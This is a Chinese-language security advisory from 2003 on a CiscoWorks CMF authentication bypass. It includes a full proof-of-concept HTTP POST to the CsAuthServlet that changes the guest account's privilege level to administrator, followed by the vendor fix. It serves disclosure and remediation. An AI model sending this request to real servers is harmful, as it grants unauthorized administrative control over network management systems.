CiscoWorks Common Management Foundation绕过管理验证漏洞发布时间:2003-08-13 更新时间:2003-08-13 严重程度:高 威胁程度:远程管理员权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:8410 受影响系统 Cisco CiscoWorks CD1 5th Edition详细描述 CiscoWorks Common Management Foundation(CMF)提供了一个应用程序框架,使所有的CiscoWorks应用程序共享一个共同的管理功能模型。CMF的访问验证实现上存在漏洞,一个非特权用户,包括guest用户,通过发送一个特殊构造的URL到CiscoWorks服务器可以无需认证获取管理员权限。 测试代码 POST /CSCOnm/servlet/com.cisco.nm.cmf.servlet.CsAuthServlet HTTP/1.0 Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: 10.10.10.1:1741 Content-Length: 114 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: jrunsessionid=1057059156201223367 cmd=modifyUser&name=guest&pwd=&email=&ccoId=&ccoPwd=&proxyId=&proxyPwd=&priv iledges=0 解决方案 厂商已经在CiscoWorks Common Services 2.2版软件中修补了此漏洞,请联系厂商获取补丁。 相关信息 CiscoWorks 2000 Priviledge Escalation Vulnerability http://lists.insecure.org/lists/bugtraq/2003/Aug/0132.html Cisco Security Advisory: CiscoWorks Application Vulnerabilities http://www.cisco.com/warp/public/707/cisco-sa-20030813-cmf.shtml |
